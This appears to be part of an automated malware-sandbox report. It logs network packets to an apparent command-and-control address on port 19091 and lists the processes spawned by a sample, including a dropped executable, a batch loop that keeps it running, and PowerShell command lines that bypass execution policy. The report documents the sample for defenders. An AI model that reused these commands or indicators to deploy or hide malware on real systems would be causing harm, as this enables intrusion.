                                                                Dec 27, 2024 13:10:25.998099089 CET1909149795118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:25.998245955 CET1909149795118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:25.998317957 CET4979519091192.168.2.4118.107.44.219
                                                                Dec 27, 2024 13:10:26.002031088 CET1909149795118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:26.002166033 CET1909149795118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:26.002213955 CET4979519091192.168.2.4118.107.44.219
                                                                Dec 27, 2024 13:10:26.005742073 CET1909149795118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:26.005836964 CET1909149795118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:26.005897045 CET4979519091192.168.2.4118.107.44.219
                                                                Dec 27, 2024 13:10:26.009568930 CET1909149795118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:26.009721041 CET1909149795118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:26.009772062 CET4979519091192.168.2.4118.107.44.219
                                                                Dec 27, 2024 13:10:26.013641119 CET1909149795118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:26.013798952 CET1909149795118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:26.013848066 CET4979519091192.168.2.4118.107.44.219
                                                                Dec 27, 2024 13:10:26.053139925 CET1909149795118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:26.053419113 CET1909149795118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:26.053477049 CET4979519091192.168.2.4118.107.44.219
                                                                Dec 27, 2024 13:10:26.054905891 CET1909149795118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:26.099850893 CET4979519091192.168.2.4118.107.44.219
                                                                Dec 27, 2024 13:10:26.126311064 CET1909149795118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:26.142813921 CET1909149795118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:26.143166065 CET1909149795118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:26.144037008 CET1909149795118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:26.144131899 CET4979519091192.168.2.4118.107.44.219
                                                                Dec 27, 2024 13:10:26.144171953 CET1909149795118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:26.146998882 CET1909149795118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:26.147109985 CET4979519091192.168.2.4118.107.44.219
                                                                Dec 27, 2024 13:10:26.147128105 CET1909149795118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:26.149971962 CET1909149795118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:26.150165081 CET1909149795118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:26.150234938 CET4979519091192.168.2.4118.107.44.219
                                                                Dec 27, 2024 13:10:26.152951956 CET1909149795118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:26.153017998 CET4979519091192.168.2.4118.107.44.219
                                                                Dec 27, 2024 13:10:26.153096914 CET1909149795118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:26.155811071 CET1909149795118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:26.155854940 CET1909149795118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:26.155868053 CET4979519091192.168.2.4118.107.44.219
                                                                Dec 27, 2024 13:10:26.158751965 CET1909149795118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:26.158799887 CET4979519091192.168.2.4118.107.44.219
                                                                Dec 27, 2024 13:10:26.158874989 CET1909149795118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:26.161761045 CET1909149795118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:26.161814928 CET4979519091192.168.2.4118.107.44.219
                                                                Dec 27, 2024 13:10:26.161854982 CET1909149795118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:26.164686918 CET1909149795118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:26.164771080 CET1909149795118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:26.164828062 CET4979519091192.168.2.4118.107.44.219
                                                                Dec 27, 2024 13:10:26.167653084 CET1909149795118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:26.167740107 CET4979519091192.168.2.4118.107.44.219
                                                                Dec 27, 2024 13:10:26.167774916 CET1909149795118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:26.170639038 CET1909149795118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:26.170690060 CET4979519091192.168.2.4118.107.44.219
                                                                Dec 27, 2024 13:10:26.170777082 CET1909149795118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:26.173612118 CET1909149795118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:26.173664093 CET4979519091192.168.2.4118.107.44.219
                                                                Dec 27, 2024 13:10:26.173707008 CET1909149795118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:26.176625967 CET1909149795118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:26.176683903 CET4979519091192.168.2.4118.107.44.219
                                                                Dec 27, 2024 13:10:26.176713943 CET1909149795118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:26.179549932 CET1909149795118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:26.179614067 CET4979519091192.168.2.4118.107.44.219
                                                                Dec 27, 2024 13:10:26.179671049 CET1909149795118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:26.181765079 CET1909149795118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:26.181864977 CET1909149795118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:26.181941986 CET4979519091192.168.2.4118.107.44.219
                                                                Dec 27, 2024 13:10:26.183758020 CET1909149795118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:26.183876038 CET1909149795118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:26.183932066 CET4979519091192.168.2.4118.107.44.219
                                                                Dec 27, 2024 13:10:26.185868025 CET1909149795118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:26.185920954 CET4979519091192.168.2.4118.107.44.219
                                                                Dec 27, 2024 13:10:26.186011076 CET1909149795118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:26.187992096 CET1909149795118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:26.188045025 CET4979519091192.168.2.4118.107.44.219
                                                                Dec 27, 2024 13:10:26.188132048 CET1909149795118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:26.190119028 CET1909149795118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:26.190149069 CET1909149795118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:26.190207005 CET4979519091192.168.2.4118.107.44.219
                                                                Dec 27, 2024 13:10:26.192397118 CET1909149795118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:26.192449093 CET4979519091192.168.2.4118.107.44.219
                                                                Dec 27, 2024 13:10:26.192486048 CET1909149795118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:26.194263935 CET1909149795118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:26.194358110 CET1909149795118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:26.194426060 CET4979519091192.168.2.4118.107.44.219
                                                                Dec 27, 2024 13:10:26.196367979 CET1909149795118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:26.196523905 CET1909149795118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:26.196582079 CET4979519091192.168.2.4118.107.44.219
                                                                Dec 27, 2024 13:10:26.198507071 CET1909149795118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:26.198533058 CET1909149795118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:26.198590994 CET4979519091192.168.2.4118.107.44.219
                                                                Dec 27, 2024 13:10:26.200553894 CET1909149795118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:26.200609922 CET4979519091192.168.2.4118.107.44.219
                                                                Dec 27, 2024 13:10:26.200678110 CET1909149795118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:26.202711105 CET1909149795118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:26.202810049 CET4979519091192.168.2.4118.107.44.219
                                                                Dec 27, 2024 13:10:26.202812910 CET1909149795118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:26.204767942 CET1909149795118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:26.204832077 CET4979519091192.168.2.4118.107.44.219
                                                                Dec 27, 2024 13:10:26.204874992 CET1909149795118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:26.206876993 CET1909149795118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:26.206940889 CET4979519091192.168.2.4118.107.44.219
                                                                Dec 27, 2024 13:10:26.206948996 CET1909149795118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:26.208991051 CET1909149795118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:26.209045887 CET4979519091192.168.2.4118.107.44.219
                                                                Dec 27, 2024 13:10:26.209083080 CET1909149795118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:26.211060047 CET1909149795118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:26.211204052 CET1909149795118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:26.211239100 CET4979519091192.168.2.4118.107.44.219
                                                                Dec 27, 2024 13:10:26.213217974 CET1909149795118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:26.213268995 CET4979519091192.168.2.4118.107.44.219
                                                                Dec 27, 2024 13:10:26.213304996 CET1909149795118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:26.215686083 CET1909149795118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:26.215827942 CET1909149795118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:26.215910912 CET4979519091192.168.2.4118.107.44.219
                                                                Dec 27, 2024 13:10:26.217346907 CET1909149795118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:26.217395067 CET4979519091192.168.2.4118.107.44.219
                                                                Dec 27, 2024 13:10:26.217448950 CET1909149795118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:26.219508886 CET1909149795118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:26.219559908 CET4979519091192.168.2.4118.107.44.219
                                                                Dec 27, 2024 13:10:26.219713926 CET1909149795118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:26.221584082 CET1909149795118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:26.221626043 CET4979519091192.168.2.4118.107.44.219
                                                                Dec 27, 2024 13:10:26.221651077 CET1909149795118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:26.223678112 CET1909149795118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:26.223741055 CET4979519091192.168.2.4118.107.44.219
                                                                Dec 27, 2024 13:10:26.223817110 CET1909149795118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:26.225773096 CET1909149795118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:26.225840092 CET4979519091192.168.2.4118.107.44.219
                                                                Dec 27, 2024 13:10:26.225883007 CET1909149795118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:26.227799892 CET1909149795118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:26.227848053 CET4979519091192.168.2.4118.107.44.219
                                                                Dec 27, 2024 13:10:26.327526093 CET1909149795118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:26.327622890 CET1909149795118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:26.327887058 CET4979519091192.168.2.4118.107.44.219
                                                                Dec 27, 2024 13:10:26.343602896 CET1909149795118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:26.343700886 CET1909149795118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:26.343882084 CET4979519091192.168.2.4118.107.44.219
                                                                Dec 27, 2024 13:10:26.351767063 CET1909149795118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:26.351877928 CET1909149795118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:26.352632046 CET1909149795118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:26.352703094 CET4979519091192.168.2.4118.107.44.219
                                                                Dec 27, 2024 13:10:26.352708101 CET1909149795118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:26.352971077 CET4979519091192.168.2.4118.107.44.219
                                                                Dec 27, 2024 13:10:26.354315996 CET1909149795118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:26.354327917 CET1909149795118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:26.354412079 CET4979519091192.168.2.4118.107.44.219
                                                                Dec 27, 2024 13:10:26.355977058 CET1909149795118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:26.356072903 CET1909149795118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:26.356159925 CET4979519091192.168.2.4118.107.44.219
                                                                Dec 27, 2024 13:10:26.357561111 CET1909149795118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:26.357969999 CET1909149795118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:26.358027935 CET4979519091192.168.2.4118.107.44.219
                                                                Dec 27, 2024 13:10:26.359154940 CET1909149795118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:26.359338045 CET1909149795118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:26.361072063 CET1909149795118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:26.361128092 CET4979519091192.168.2.4118.107.44.219
                                                                Dec 27, 2024 13:10:26.361170053 CET1909149795118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:26.361226082 CET4979519091192.168.2.4118.107.44.219
                                                                Dec 27, 2024 13:10:26.362706900 CET1909149795118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:26.362788916 CET1909149795118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:26.362858057 CET4979519091192.168.2.4118.107.44.219
                                                                Dec 27, 2024 13:10:27.425124884 CET4980319091192.168.2.4118.107.44.219
                                                                Dec 27, 2024 13:10:27.544893026 CET1909149803118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:27.544965982 CET4980319091192.168.2.4118.107.44.219
                                                                Dec 27, 2024 13:10:29.381211996 CET4979519091192.168.2.4118.107.44.219
                                                                Dec 27, 2024 13:10:33.702743053 CET4980319091192.168.2.4118.107.44.219
                                                                Dec 27, 2024 13:10:33.823317051 CET1909149803118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:33.823331118 CET1909149803118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:33.823340893 CET1909149803118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:33.824678898 CET1909149803118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:34.438448906 CET1909149803118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:34.439064026 CET4980319091192.168.2.4118.107.44.219
                                                                Dec 27, 2024 13:10:34.558913946 CET1909149803118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:44.475075960 CET4980319091192.168.2.4118.107.44.219
                                                                Dec 27, 2024 13:10:44.594872952 CET1909149803118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:45.005395889 CET1909149803118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:45.052958012 CET4980319091192.168.2.4118.107.44.219
                                                                Dec 27, 2024 13:10:45.075567007 CET4980319091192.168.2.4118.107.44.219
                                                                Dec 27, 2024 13:10:45.195135117 CET1909149803118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:11:01.462336063 CET4980319091192.168.2.4118.107.44.219
                                                                Dec 27, 2024 13:11:01.581909895 CET1909149803118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:11:01.983594894 CET1909149803118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:11:02.037348032 CET4980319091192.168.2.4118.107.44.219
                                                                Dec 27, 2024 13:11:02.069046021 CET4980319091192.168.2.4118.107.44.219
                                                                Dec 27, 2024 13:11:02.190128088 CET1909149803118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:11:17.896831989 CET4980319091192.168.2.4118.107.44.219
                                                                Dec 27, 2024 13:11:18.016571045 CET1909149803118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:11:18.417762041 CET1909149803118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:11:18.459285021 CET4980319091192.168.2.4118.107.44.219
                                                                Dec 27, 2024 13:11:18.677208900 CET4980319091192.168.2.4118.107.44.219
                                                                Dec 27, 2024 13:11:18.796840906 CET1909149803118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:11:34.693882942 CET4980319091192.168.2.4118.107.44.219
                                                                Dec 27, 2024 13:11:34.813349962 CET1909149803118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:11:35.214637041 CET1909149803118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:11:35.256103992 CET4980319091192.168.2.4118.107.44.219
                                                                Dec 27, 2024 13:11:35.336983919 CET4980319091192.168.2.4118.107.44.219
                                                                Dec 27, 2024 13:11:35.456991911 CET1909149803118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:11:51.209343910 CET4980319091192.168.2.4118.107.44.219
                                                                Dec 27, 2024 13:11:51.328891993 CET1909149803118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:11:51.731195927 CET1909149803118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:11:51.771764994 CET4980319091192.168.2.4118.107.44.219
                                                                Dec 27, 2024 13:11:51.846676111 CET4980319091192.168.2.4118.107.44.219
                                                                Dec 27, 2024 13:11:51.966113091 CET1909149803118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:12:08.287437916 CET4980319091192.168.2.4118.107.44.219
                                                                Dec 27, 2024 13:12:08.407073975 CET1909149803118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:12:08.813766956 CET1909149803118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:12:08.865489006 CET4980319091192.168.2.4118.107.44.219
                                                                Dec 27, 2024 13:12:08.927462101 CET4980319091192.168.2.4118.107.44.219
                                                                Dec 27, 2024 13:12:09.047151089 CET1909149803118.107.44.219192.168.2.4

                                                                Statistics

                                                                CPU Usage

                                                                Click to jump to process

                                                                Memory Usage

                                                                Click to jump to process

                                                                High Level Behavior Distribution

                                                                Click to dive into process behavior distribution

                                                                Behavior

                                                                Click to jump to process

                                                                System Behavior

                                                                General

                                                                Target ID:0
                                                                Start time:07:09:02
                                                                Start date:27/12/2024
                                                                Path:C:\Users\user\Desktop\OdiHmn3pRK.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Users\user\Desktop\OdiHmn3pRK.exe"
                                                                Imagebase:0x400000
                                                                File size:36'618'436 bytes
                                                                MD5 hash:11933D4B44331258739282E769CA4914
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:low
                                                                Has exited:true

                                                                General

                                                                Target ID:1
                                                                Start time:07:09:08
                                                                Start date:27/12/2024
                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Windows\System32\cmd.exe" /c start C:\Users\Public\Bilite\Axialis\kwpswnsserver.exe
                                                                Imagebase:0x240000
                                                                File size:236'544 bytes
                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                General

                                                                Target ID:2
                                                                Start time:07:09:08
                                                                Start date:27/12/2024
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff7699e0000
                                                                File size:862'208 bytes
                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                General

                                                                Target ID:3
                                                                Start time:07:09:08
                                                                Start date:27/12/2024
                                                                Path:C:\Users\Public\Bilite\Axialis\kwpswnsserver.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:C:\Users\Public\Bilite\Axialis\kwpswnsserver.exe
                                                                Imagebase:0x4a0000
                                                                File size:315'264 bytes
                                                                MD5 hash:607336E586D1BD00DCF1CA7EED97A8DB
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Antivirus matches:
                                                                • Detection: 0%, ReversingLabs
                                                                Reputation:low
                                                                Has exited:false

                                                                General

                                                                Target ID:8
                                                                Start time:07:10:18
                                                                Start date:27/12/2024
                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:cmd.exe /B /c "C:\Users\user\AppData\Local\Temp\\monitor.bat"
                                                                Imagebase:0x240000
                                                                File size:236'544 bytes
                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:false

                                                                General

                                                                Target ID:9
                                                                Start time:07:10:18
                                                                Start date:27/12/2024
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff7699e0000
                                                                File size:862'208 bytes
                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:false

                                                                General

                                                                Target ID:10
                                                                Start time:07:10:18
                                                                Start date:27/12/2024
                                                                Path:C:\Windows\SysWOW64\tasklist.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:tasklist /FI "IMAGENAME eq kwpswnsserver.exe"
                                                                Imagebase:0xc60000
                                                                File size:79'360 bytes
                                                                MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                General

                                                                Target ID:11
                                                                Start time:07:10:18
                                                                Start date:27/12/2024
                                                                Path:C:\Windows\SysWOW64\findstr.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:findstr /I "kwpswnsserver.exe"
                                                                Imagebase:0xb10000
                                                                File size:29'696 bytes
                                                                MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                General

                                                                Target ID:12
                                                                Start time:07:10:18
                                                                Start date:27/12/2024
                                                                Path:C:\Windows\SysWOW64\timeout.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:timeout /t 30 /nobreak
                                                                Imagebase:0xfb0000
                                                                File size:25'088 bytes
                                                                MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                General

                                                                Target ID:13
                                                                Start time:07:10:19
                                                                Start date:27/12/2024
                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:cmd.exe /C powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser"
                                                                Imagebase:0x240000
                                                                File size:236'544 bytes
                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                General

                                                                Target ID:14
                                                                Start time:07:10:19
                                                                Start date:27/12/2024
                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:cmd.exe /C powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\updated.ps1
                                                                Imagebase:0x240000
                                                                File size:236'544 bytes
                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                General

                                                                Target ID:15
                                                                Start time:07:10:19
                                                                Start date:27/12/2024
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff7699e0000
                                                                File size:862'208 bytes
                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                General

                                                                Target ID:16
                                                                Start time:07:10:19
                                                                Start date:27/12/2024
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff7699e0000
                                                                File size:862'208 bytes
                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                General

                                                                Target ID:17
                                                                Start time:07:10:19
                                                                Start date:27/12/2024
                                                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser"
                                                                Imagebase:0x6a0000
                                                                File size:433'152 bytes
                                                                MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                General

                                                                Target ID:18
                                                                Start time:07:10:19
                                                                Start date:27/12/2024
                                                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\updated.ps1
                                                                Imagebase:0x6a0000
                                                                File size:433'152 bytes
                                                                MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                General

                                                                Target ID:20
                                                                Start time:07:10:48
                                                                Start date:27/12/2024
                                                                Path:C:\Windows\SysWOW64\tasklist.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:tasklist /FI "IMAGENAME eq kwpswnsserver.exe"
                                                                Imagebase:0xc60000
                                                                File size:79'360 bytes
                                                                MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                General

                                                                Target ID:21
                                                                Start time:07:10:48
                                                                Start date:27/12/2024
                                                                Path:C:\Windows\SysWOW64\findstr.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:findstr /I "kwpswnsserver.exe"
                                                                Imagebase:0xb10000
                                                                File size:29'696 bytes
                                                                MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                General

                                                                Target ID:22
                                                                Start time:07:10:48
                                                                Start date:27/12/2024
                                                                Path:C:\Windows\SysWOW64\timeout.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:timeout /t 30 /nobreak
                                                                Imagebase:0xfb0000
                                                                File size:25'088 bytes
                                                                MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                General

                                                                Target ID:23
                                                                Start time:07:11:18
                                                                Start date:27/12/2024
                                                                Path:C:\Windows\SysWOW64\tasklist.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:tasklist /FI "IMAGENAME eq kwpswnsserver.exe"
                                                                Imagebase:0xc60000
                                                                File size:79'360 bytes
                                                                MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                General

                                                                Target ID:24
                                                                Start time:07:11:18
                                                                Start date:27/12/2024
                                                                Path:C:\Windows\SysWOW64\findstr.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:findstr /I "kwpswnsserver.exe"
                                                                Imagebase:0xb10000
                                                                File size:29'696 bytes
                                                                MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                General

                                                                Target ID:25
                                                                Start time:07:11:18
                                                                Start date:27/12/2024
                                                                Path:C:\Windows\SysWOW64\timeout.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:timeout /t 30 /nobreak
                                                                Imagebase:0xfb0000
                                                                File size:25'088 bytes
